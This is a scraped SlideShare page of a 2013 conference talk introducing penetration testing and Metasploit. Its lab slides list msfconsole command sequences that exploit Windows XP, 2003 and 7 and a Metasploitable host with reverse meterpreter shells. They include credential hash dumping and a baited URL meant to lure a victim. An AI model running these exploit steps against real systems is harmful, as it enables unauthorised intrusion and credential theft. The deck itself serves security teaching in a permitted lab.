SlideShare a Scribd company logo
PENETRATIONTESTINGAND
METASPLOITBASIC
Presented by 	

Syarif	

!
Indonesia Creative Open Source Software ( ICrOSS ) 2013	

Jakarta, April 25 2013	

Balai Kartini
Agenda
• Why & What’s Penetration Testing ( Pentest )	

• << back|track basic overview	

• Information Gathering & Port Scan ( Demo)	

• Metasploit Basics & Meterpreter	

• Challenge ;)
Whoami
• Just me my self : http://fl3x.us ; @fl3xu5	

• InfoSec Enthusiast & Trainer	

• Lecture & Assistant Manager	

• CyberCrime Investigator
Why Pentest ?
• Millions of dollars have been invested in
security programs to protect critical
infrastructure to prevent data breaches *1)	

• Penetration Test is one of the most
effective ways to identify weaknesses and
deficiencies in these programs *1)
What’s Penetration Testing
• A method to evaluate the security of computer system / network	

• Practice ( attacking ) an IT System like a ‘hacker’ does	

• Find security holes ( weaknesses )	

• Bypass security mechanism	

• Compromise an organization’s IT system security
Must have permission from IT system owner !
illegal activity put you in Jail
Ethics
• Think before act 	

• Don’t be stupid 	

• Don’t be malicious
Pentest Phases
Vulnerability Analysis
Information Gathering
Exploitation
Post Exploitation
Reporting
<< back|track overview
• .
The Most Advanced Linux Security Distribution
Open Source & Always be
Developed for Security Professional
Real World Pentesting Tools
<< back|track overview
• Watch theVideo ! :)
<< back|track overview
<< back|track overview
What’s
• Not just a tool, but an entire framework *1)	

• an Open source platform for writing
security tools and exploits *2)	

• Easily build attack vectors to add its
exploits, payloads, encoders,	

• Create and execute more advanced attack	

• Ruby based
Metasploit interfaces	

• MSFconsole	

• MSFcli	

• msfweb, msfgui ( discontinued ) 	

• Metasploit Pro, Metasploit Express	

• Armitage
MSFconsole
MSFcli
Metasploit Terminology
	

• Exploit : code that allow a pentester take some advantages
of a flaw within system,application, or service *1)	

• Payload : code that we want the target system to execute
( few commands to be executed on the target system ) *1)	

• Shellcode : a set of instructions used as payload when
exploitation occurs *1)	

• Module : a software that can be used by metasploit *1)	

• Listener : a component for waiting an incoming connection
*1)
How does exploitation works
attacker
exploit + payload
vulnerable server
1
exploit run , then payload run
2
3 Upload / Download data
Traditional PentestVs Metasploit
Public Exploit Gathering
Change offsets
Replace ShellCode
Load Metasploit
Choose the target OS
Use exploit
SET Payload
Execute
Traditional Pentest Metasploit for Pentest
Meterpreter
• as a payload after vulnerability is exploited *1)	

• Improve the post exploitation
Meterpreter
Exploiting a vulnerability
Select a meterpreter as a payload
meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario
attacker vulnerable OS onVMware
* : Ubuntu 8.04 metasploitable
*
Pentest Skenario
• Set network adapter : NAT	

• Firewall & Windows update : OFF	

• Fresh OS installed	

!
• startx
OS in the Lab
• BackTrack 5 R 3	

• IP address : 172.16.150.169	

• Windows Xp SP 2	

• IP address : 172.16.150.165	

• Windows 2003 Server 	

• IP address : 172.16.150.167	

• Windows 7	

• IP address : 172.16.150.170	

• Ubuntu Linux 8.04 ( Metasploitable )	

• IP address : 172.16.150.171
Windows XP Exploitation
• msf > search windows/smb	

• msf > info exploit/windows/smb/ms08_067_netapi	

• msf > use exploit/windows/smb/ms08_067_netapi	

• msf exploit(ms08_067_netapi) > show payloads	

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp	

• msf exploit(ms08_067_netapi) > show options	

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165	

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169	

• msf exploit(ms08_067_netapi) > show options	

• msf exploit(ms08_067_netapi) > exploit	

• meterpreter > background	

• session -l
Windows XP Post Exploitation
• session -i 1	

• meterpreter > getsystem -h	

• getuid	

• hashdump
Windows 2003 Server Exploitation
• msf > search windows/smb	

• msf > info exploit/windows/smb/ms08_067_netapi	

• msf > use exploit/windows/smb/ms08_067_netapi	

• msf exploit(ms08_067_netapi) > show payloads	

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp	

• msf exploit(ms08_067_netapi) > show options	

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167	

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169	

• msf exploit(ms08_067_netapi) > show options	

• msf exploit(ms08_067_netapi) > exploit	

• meterpreter > background	

• session -l
Windows 7 Exploitation
• msf > use exploit/windows/browser/ms11_003_ie_css_import	

• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp	

• msf exploit(ms11_003_ie_css_import) > show options	

• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169	

• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80	

• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi	

• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169	

• msf exploit(ms11_003_ie_css_import) > set LPORT 443	

• msf exploit(ms11_003_ie_css_import) > exploit	

Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi
Windows 7 Exploitation
• msf exploit(ms11_003_ie_css_import) > sessions -l	

• msf exploit(ms11_003_ie_css_import) > sessions -i 1	

• meterpreter > sysinfo	

• meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation
• search distcc	

• use exploit/unix/misc/distcc_exec	

• show payloads	

• set PAYLOAD cmd/unix/reverse	

• show options	

• set rhost 172.16.150.171 	

• set lhost 172.16.150.169	

• exploit
Any Question ?
Contact me
• Website : http://fl3x.us	

• Twitter : @fl3xu5
Greet & Thanks To
• BackTrack Linux	

• Metasploit Team ( HD Moore & rapid7 )	

• Offensive Security / Metasploit Unleashed	

• David Kennedy	

• Georgia Weidman
References
!
!
• 1. Metasploit The Penetration Tester’s Guide : David
Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni	

• 2. http://www.metasploit.com	

• 3. http://www.offensive-security.com/metasploit-
unleashed/Main_Page	

• 4. http://www.pentest-standard.org/index.php/
PTES_Technical_Guidelines
Challenge in 45 minutes :)
• ConnectYour Windows OS to TP LINK Access
Point over dhcp	

• BackTrack 5R3VMWare setting : 	

• Network adapter : Bridge	

• Get 4 Pictures by your self & shutdown the targets
( if you can :p ) 	

• Win the Polo T-Shirt indobacktrack
Challenge in 45 minutes :)

More Related Content

What's hot

Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
Ramnath Shenoy
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
Security Scope
 
Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
securityxploded
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
dc612
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
Michael Boelen
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
Ashok Kumar
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learned
Anant Shrivastava
 
Automating malware analysis
Automating malware analysis Automating malware analysis
Automating malware analysis
Cysinfo Cyber Security Community
 
Ch0 1
Ch0 1Ch0 1
Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Justin collins - Practical Static Analysis for continuous application delivery
Justin collins - Practical Static Analysis for continuous application deliveryJustin collins - Practical Static Analysis for continuous application delivery
Justin collins - Practical Static Analysis for continuous application delivery
DevSecCon
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014
Anant Shrivastava
 
Reversing malware analysis training part7 unpackingupx
Reversing malware analysis training part7 unpackingupxReversing malware analysis training part7 unpackingupx
Reversing malware analysis training part7 unpackingupx
Cysinfo Cyber Security Community
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysis
securityxploded
 

What's hot (20)

Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Metaploit
MetaploitMetaploit
Metaploit
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Tale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learnedTale of Forgotten Disclosure and Lesson learned
Tale of Forgotten Disclosure and Lesson learned
 
Automating malware analysis
Automating malware analysis Automating malware analysis
Automating malware analysis
 
Ch0 1
Ch0 1Ch0 1
Ch0 1
 
Metasploit
MetasploitMetasploit
Metasploit
 
Justin collins - Practical Static Analysis for continuous application delivery
Justin collins - Practical Static Analysis for continuous application deliveryJustin collins - Practical Static Analysis for continuous application delivery
Justin collins - Practical Static Analysis for continuous application delivery
 
When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014When the internet bleeded : RootConf 2014
When the internet bleeded : RootConf 2014
 
Reversing malware analysis training part7 unpackingupx
Reversing malware analysis training part7 unpackingupxReversing malware analysis training part7 unpackingupx
Reversing malware analysis training part7 unpackingupx
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysis
 

Viewers also liked

Social Network Security & Backdooring email
Social Network Security & Backdooring emailSocial Network Security & Backdooring email
Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP
 
Wireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek KominfoWireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek Kominfo
M.Syarifudin, ST, OSCP, OSWP
 
Information gath
Information gathInformation gath
Prepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec ProfessionalPrepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec Professional
M.Syarifudin, ST, OSCP, OSWP
 
My pwk & oscp journey
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
M.Syarifudin, ST, OSCP, OSWP
 
IPTV Security
IPTV SecurityIPTV Security

Viewers also liked (6)

Social Network Security & Backdooring email
Social Network Security & Backdooring emailSocial Network Security & Backdooring email
Social Network Security & Backdooring email
 
Wireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek KominfoWireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek Kominfo
 
Information gath
Information gathInformation gath
Information gath
 
Prepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec ProfessionalPrepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec Professional
 
My pwk & oscp journey
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
 
IPTV Security
IPTV SecurityIPTV Security
IPTV Security
 

Similar to iCrOSS 2013_Pentest

Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
Bangladesh Network Operators Group
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
PRISMA CSI
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
IOSR Journals
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
Nutan Kumar Panda
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
Florent Batard
 
Metasploit primary
Metasploit primaryMetasploit primary
L27
L27L27
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules  - Detecting more with RSA Security AnalyticsThe Golden Rules  - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security Analytics
Demetrio Milea
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данных
Positive Hack Days
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara
 

Similar to iCrOSS 2013_Pentest (20)

Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Metasploit
MetasploitMetasploit
Metasploit
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
L27
L27L27
L27
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
The Golden Rules - Detecting more with RSA Security Analytics
The Golden Rules  - Detecting more with RSA Security AnalyticsThe Golden Rules  - Detecting more with RSA Security Analytics
The Golden Rules - Detecting more with RSA Security Analytics
 
На страже ваших денег и данных
На страже ваших денег и данныхНа страже ваших денег и данных
На страже ваших денег и данных
 
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
 

Recently uploaded

QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
AlexanderRichford
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
christinelarrosa
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
Tobias Schneck
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
FilipTomaszewski5
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
operationspcvita
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
 
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
manji sharman06
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
UiPathCommunity
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
Fwdays
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
Mydbops
 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
Fwdays
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
leebarnesutopia
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
Pablo Gómez Abajo
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
ScyllaDB
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
HarpalGohil4
 

Recently uploaded (20)

QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
 
Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!Containers & AI - Beauty and the Beast!?!
Containers & AI - Beauty and the Beast!?!
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
 
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
Call Girls Chandigarh🔥7023059433🔥Agency Profile Escorts in Chandigarh Availab...
 
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
 
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin..."$10 thousand per minute of downtime: architecture, queues, streaming and fin...
"$10 thousand per minute of downtime: architecture, queues, streaming and fin...
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
Mutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented ChatbotsMutation Testing for Task-Oriented Chatbots
Mutation Testing for Task-Oriented Chatbots
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
 
AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)AWS Certified Solutions Architect Associate (SAA-C03)
AWS Certified Solutions Architect Associate (SAA-C03)
 

iCrOSS 2013_Pentest

  • 1. PENETRATIONTESTINGAND METASPLOITBASIC Presented by Syarif ! Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini
  • 2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track basic overview • Information Gathering & Port Scan ( Demo) • Metasploit Basics & Meterpreter • Challenge ;)
  • 3. Whoami • Just me my self : http://fl3x.us ; @fl3xu5 • InfoSec Enthusiast & Trainer • Lecture & Assistant Manager • CyberCrime Investigator
  • 4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  • 5. What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
  • 6. Ethics • Think before act • Don’t be stupid • Don’t be malicious
  • 7. Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
  • 8. << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
  • 9. << back|track overview • Watch theVideo ! :)
  • 12. What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
  • 13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  • 16. Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
  • 17. How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
  • 18. Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
  • 19. Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
  • 20. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
  • 26. Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
  • 27. Pentest Skenario • Set network adapter : NAT • Firewall & Windows update : OFF • Fresh OS installed ! • startx
  • 28. OS in the Lab • BackTrack 5 R 3 • IP address : 172.16.150.169 • Windows Xp SP 2 • IP address : 172.16.150.165 • Windows 2003 Server • IP address : 172.16.150.167 • Windows 7 • IP address : 172.16.150.170 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.150.171
